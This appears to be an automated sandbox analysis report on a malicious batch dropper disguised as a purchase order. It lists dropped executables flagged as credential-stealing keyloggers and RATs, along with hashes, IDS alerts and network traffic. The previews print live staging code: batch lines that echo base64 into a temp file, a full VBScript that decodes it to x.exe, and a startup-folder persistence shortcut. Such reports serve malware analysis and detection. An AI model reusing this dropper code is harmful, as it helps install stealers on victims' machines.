                                                                                                                                  Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rpkhzpuO.pif.log

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):520
                                                                                                                                  Entropy (8bit):5.355496254154943
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                                                                                                                                  MD5:3C255C75EA6EB42410894C0D08A4E324
                                                                                                                                  SHA1:34B3512313867B269C545241CD502B960213293A
                                                                                                                                  SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                                                                                                                                  SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2232
                                                                                                                                  Entropy (8bit):5.379184608538005
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:bWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:bLHyIFKL3IZ2KRH9Ougss
                                                                                                                                  MD5:ED589B424203CBD421A2E43D1BFA6DFC
                                                                                                                                  SHA1:7C707DDD0B05B396964BB70CAFED31F6E54660B3
                                                                                                                                  SHA-256:FAE87DB2990B36ABC27C2BAF4BC869F8B73EFDE806ADD150E705EF5C5D3A6E2C
                                                                                                                                  SHA-512:A334C5E28FB4A46F5C0A25A00EC3CDCBD7329B1456A9544445B774E1AF9220D150E76D1BDADCFA8679EB1F487E1F499A93797651124CD3C03CB2E1C257A8AC81
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:@...e.................................&..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Microsofts.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):98816
                                                                                                                                  Entropy (8bit):5.666546286050177
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:qwa4JaIFveZKGAmwJVeDhp0dqnjErVf4UMR7pspNYZd:24Jj4ZKGHwJVeDDKqnj6bMDspNC
                                                                                                                                  MD5:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                                  SHA1:81BDE9535B07E103F89F6AEABDB873D7E35816C2
                                                                                                                                  SHA-256:DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
                                                                                                                                  SHA-512:AA958D22952D27BAD1C0D3C9D08DDBF364274363D5359791B7B06A5D5D91A21F57E9C9E1079F3F95D7CE5828DCD3E79914FF2BD836F347B5734151D668D935DE
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nH...............P..x............... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...................Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....*&..( ....*.s!........s"........s#........s$........s%........*Z........o8...........*&..(9....*&........*".......*Vs....(B...t.........*..(C...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*b.r...p.oa...(....(@....*:.~.....o....&*.*:.(P....(Q....*..~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):70656
                                                                                                                                  Entropy (8bit):4.910353963160109
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                  MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                  SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                  SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                  SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxvq3mua.ebl.psm1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hb133yyz.rtw.ps1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oaueww4n.cjl.psm1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spg1y3eo.use.ps1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\x

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):36864
                                                                                                                                  Entropy (8bit):5.572584352781534
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:ND+pvzeK1scVxBDyFPl6v63jZyTgmpHgTvJk2vLQzjqSlfok92KpvFCI5l4YXFdK:V+ld1scVxwz3jkpKkScHqkf3iIcmFqt
                                                                                                                                  MD5:77F96223CF3BA1FA0F812F9BC247E052
                                                                                                                                  SHA1:21B9F79964C76FFCF08AD4D49FAC190B78D272DC
                                                                                                                                  SHA-256:8F236C326D3C623697657A34CA9E98315B77A59EEEF1525CAB018E213100E8F4
                                                                                                                                  SHA-512:0153A63AFC1538D139628EDDB5F4428BAFEB4EE186F49E8078C651DE001C7471641B3DE0CACF5B07A76B28F6718A33C87A0735D8221FF9A6AFECBCD9154CFAC1
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4g..dW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQ..kAGV5CKgAAAAAAAAAA4ACOgQsBAhkAiAUAAI4OAAAAAABslwUAABAAAACgBQAAAEAAABAA..AAACAAAEAAAAAAAAAAQAAAAAAAAAALAUAAAEAAAAAAAAAgAAAAAAEAAAQAAAAAAQAAAQAA..AAAAAAEAAAAAAAAAAAAAAAAAAGADIlAAAAwAYAAOgNAAAAAAAAAAAAAAAAAAAAAAAAUAYA..pGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABgAYAAAAAAAAAAAAAAAAAAAAAAAAAO..QGBgDMBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAC4fwUAABAAAACABQAA..BAAAAAAAAAAAAAAAAAAAIAAAYC5pdGV4dAAAtAcAAACQBQAACAAAAIQFAAAAAAAAAAAAAA..AAACAAAGAuZGF0YQAAANQbAAAAoAUAABwAAACMBQAAAAAAAAAAAAAAAABAAADALmJzcwAA..AADENgAAAMAFAAAAAAAAqAUAAAAAAAAAAAAAAAAAAAAAwC5pZGF0YQAAMiUAAAAABgAAJg..AAAKgFAAAAAAAAAAAAAAAAAEAAAMAudGxzAAAAADQAAAAAMAYAAAAAAADOBQAAAA

                                                                                                                                  C:\Users\user\AppData\Local\Temp\x.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\cscript.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1317376
                                                                                                                                  Entropy (8bit):6.092693903786427
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24576:hULl20LaVZ0emwYGqo1FJ89BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBx:hU1X1orJEBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                  MD5:E337ECD5680D121D6DD649956DC716CA
                                                                                                                                  SHA1:198EAA7905760AA3FEE7D7329EC6354096C6BA63
                                                                                                                                  SHA-256:80AF0DDC803BB3CD14029CD9CEE39D81B15B21FC126912EFBDD7824BA740669B
                                                                                                                                  SHA-512:75783A2850F451E4733F7CFBBF1A9451041C040BB64B7DF7AA19ABE2FFFDDF45291C4706C5F606EE6AD168779B25C0D88DE2481FC563DAB1531BFD907CC20C92
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................l.............@..............................................@..............................2%...........................P...a...........................@.......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata..2%.......&..................@....tls....4....0...........................rdata.......@......................@..@.reloc...a...P...b..................@..B.rsrc................2..............@..@....................................@..@................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\x.vbs

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):380
                                                                                                                                  Entropy (8bit):5.126074554208653
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:jpz7yVHPxORKm6JgCPmu7jjs9lVHEr6Jxlw6mvHFAF1GjyH4BZIkv:NZOmG7jU2r6JAiTrYZnv
                                                                                                                                  MD5:EC9A2FB69A379D913A4E0A953CD3B97C
                                                                                                                                  SHA1:A0303ED9F787C042071A1286BBA43A5BBDD0679E
                                                                                                                                  SHA-256:CF8268D158BB819EF158FF6CCBED64D5E379148A0ADB1F73A082A01D56D0286B
                                                                                                                                  SHA-512:FEF8E24A680991046BD7DACD6079C7E48C3031FE46CAAE722EA93797EE16C052073BA97959E992EA71AC7AB72FBCEDAA5CF4A410657AAC4C10AD24DE6935E9D6
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:Set f=CreateObject("Scripting.FileSystemObject")'v..Set p=f.GetSpecialFolder(2)'v..Set i=f.OpenTextFile(p+"\x",1)'v..c=i.ReadAll()'v..i.Close'v..Set x=CreateObject("Msxml2.DOMDocument")'v..Set o=x.CreateElement("base64")'v..o.dataType="bin.base64"'v..o.text=c'v..Set b=CreateObject("ADODB.Stream")'v..b.Type=1'v..b.Open'v..b.Write o.NodeTypedValue'v..b.SaveToFile p+"\x.exe",2'v..

                                                                                                                                  C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):665670656
                                                                                                                                  Entropy (8bit):7.999999262382833
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:
                                                                                                                                  MD5:10751439BD30D4B3066935F2DFFDC3C7
                                                                                                                                  SHA1:1D49BF5717E3330A21F054A5C151A877F0B602E1
                                                                                                                                  SHA-256:5BC477921A5678551A378E244C6B0544D0DDAA27FCDCA0E3CFCD54B53FCF4BA8
                                                                                                                                  SHA-512:B945B4E58FA48745EA8AB089F32FAFE98F966F0602FD0BC519B138D8C00F8D2606FCED0A3CBDCFDD5D2B2BA59B457697DD320972D4E8EA7376B2C2B53371F415
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Jan 9 17:09:56 2025, mtime=Thu Jan 9 17:09:56 2025, atime=Thu Jan 9 17:09:56 2025, length=70656, window=
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1784
                                                                                                                                  Entropy (8bit):3.519031277377029
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:8uvbqDklXUPX3PyqfAateVoFG9xR+O4ZvPqRzBm:8EbqDkl4X36efuR+ZXqRl
                                                                                                                                  MD5:27D7693300B294B6EF86370C3773184D
                                                                                                                                  SHA1:F21EC7099EE9804807FB0C8DAD1B2F0EC7E37DDB
                                                                                                                                  SHA-256:E85103EAA8EA660957B913ECE26991EB93145DB69BF0C08FDBA69E8971A61445
                                                                                                                                  SHA-512:AF297E6609FD0D25F88E3C7E328E662A9E86CCC48E09CBF6F9A09A46FACED3A1D3EF5C2CBC94981F95AAE58F90DCB45D16227893F297B080F09532E61104E1C2
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:L..................F.@.. .....w..b....x..b....x..b............................:..DG..Yr?.D..U..k0.&...&.......$..S...w"k..b..l....b......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2)Z*............................^.A.p.p.D.a.t.a...B.V.1.....)Z(...Roaming.@......EW<2)Z(...../......................`..R.o.a.m.i.n.g.....T.1.....)Z=...ACCApi..>......)Z=.)Z=...............................A.C.C.A.p.i.....b.2.....)Z=. .apihost.exe.H......)Z=.)Z=...........................^A..a.p.i.h.o.s.t...e.x.e.......c...............-.......b....................C:\Users\user\AppData\Roaming\ACCApi\apihost.exe....A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.6.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe...................................................................................................................

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                  Entropy (8bit):5.603636433588063
                                                                                                                                  TrID:
                                                                                                                                    File name:PO#3_RKG367.bat
                                                                                                                                    File size:2'158'506 bytes
                                                                                                                                    MD5:deaa9cb6ee189b95d1ad718df32dac56
                                                                                                                                    SHA1:ba94e1e97609cfa1bd102fe1087fc714875c6c25
                                                                                                                                    SHA256:8f721d0dc987c60cb16a14ad166eab606b1b9401d6563241eb8ed359c24ad201
                                                                                                                                    SHA512:02908f9c7ce3a1d53af14de4465744585b23d31e99e08d2a64030f60eac5da5505c93e5fe4de91aeb77b85377d57b047ed8a5d5262fd08dcffa30943b0bb88e1
                                                                                                                                    SSDEEP:49152:dCPDyxXvtkfpoX/xXGkA++z8+j+Dl+T++evHN+C2+1r+E++eaU++p+++7C+z+++q:n
                                                                                                                                    TLSH:E4A5F9377082095A9A0F49990E2878B53C36BFE3486459B7FD3E2F7A12C5BD1392C179
                                                                                                                                    File Content Preview:@Echo off..echo TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>%tmp%\x..echo AAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4g>>%tmp%\x..echo dW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:9686878b929a9886

                                                                                                                                    Network Behavior

                                                                                                                                    Suricata IDS Alerts

                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                    2025-01-09T19:09:49.222732+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64981341.185.8.252443TCP
                                                                                                                                    2025-01-09T19:09:58.095403+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649860158.101.44.24280TCP

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Jan 9, 2025 19:09:48.312793970 CET49812443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:48.312827110 CET4434981241.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:48.312908888 CET49812443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:48.313118935 CET49812443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:48.313158989 CET4434981241.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:48.313222885 CET49812443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:48.337652922 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:48.337711096 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:48.337789059 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:48.341170073 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:48.341195107 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.222655058 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.222732067 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:49.224689007 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:49.224694014 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.224983931 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.272133112 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:49.273819923 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:49.315371037 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.743685961 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.743714094 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.743722916 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.743787050 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:49.743809938 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.797147036 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:49.955105066 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.955116987 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.955159903 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.955184937 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.955188990 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:49.955198050 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.955224037 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:49.955239058 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:49.955262899 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:49.955282927 CET49813443192.168.2.641.185.8.252
                                                                                                                                    Jan 9, 2025 19:09:50.002145052 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.002160072 CET4434981341.185.8.252192.168.2.6
                                                                                                                                    Jan 9, 2025 19:09:50.002208948 CET4434981341.185.8.252192.168.2.6
